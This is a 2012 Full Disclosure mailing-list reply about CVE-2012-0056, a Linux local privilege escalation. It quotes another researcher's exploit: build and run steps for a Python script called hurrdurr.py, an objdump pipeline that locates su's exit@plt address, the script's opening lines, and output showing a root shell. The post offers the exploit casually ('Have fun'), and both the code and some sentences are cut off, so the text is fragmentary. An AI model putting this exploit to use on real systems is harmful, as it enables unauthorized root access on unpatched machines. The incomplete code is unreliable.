Full Disclosure mailing list archives

Re: Linux Local Root -- CVE-2012-0056 -- Detailed Write-up
From: "Jason A. Donenfeld" <Jason () zx2c4 com>
Date: Mon, 23 Jan 2012 02:30:44 +0100

NICE! Well, I guess posting that blog post defeated the point of not
publishing. :-D

So, here's my code:

I wrote the shellcode by hand too, and you can grab the 32 and 64 bit
versions from that same tree.

Have fun.

BTW, before I'm asked, the reason why I don't hard code 12 for the
length of the su error string is that it's different on different

On Mon, Jan 23, 2012 at 02:14, sd <sd () fucksheep org> wrote:
2012/1/23 Jason A. Donenfeld <Jason () zx2c4 com>:
Server presently DoS'd, or dreamhost is tweaking again.

boring tl;dr - don't play kaminsky on us :)

# CVE-2012-0056 amd64
# sd () fucksheep org
# hg clone https://code.google.com/p/python-passfd
# cd python-passfd; ./setup.py build_ext --inplace; cd src
# mv ~/hurrdurr.py .
# ./hurrdurr.py `objdump -d /bin/su|grep 'exit@plt'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'`
from socket import *
from passfd import *
from os import *
from socket import *
from sys import *
from time import *
if argv[-1]=='hax':
       if not fork():

./hurrdurr.py `objdump -d /bin/su|grep 'exit@plt'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'`
uid=0(root) gid=1000(sd)

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
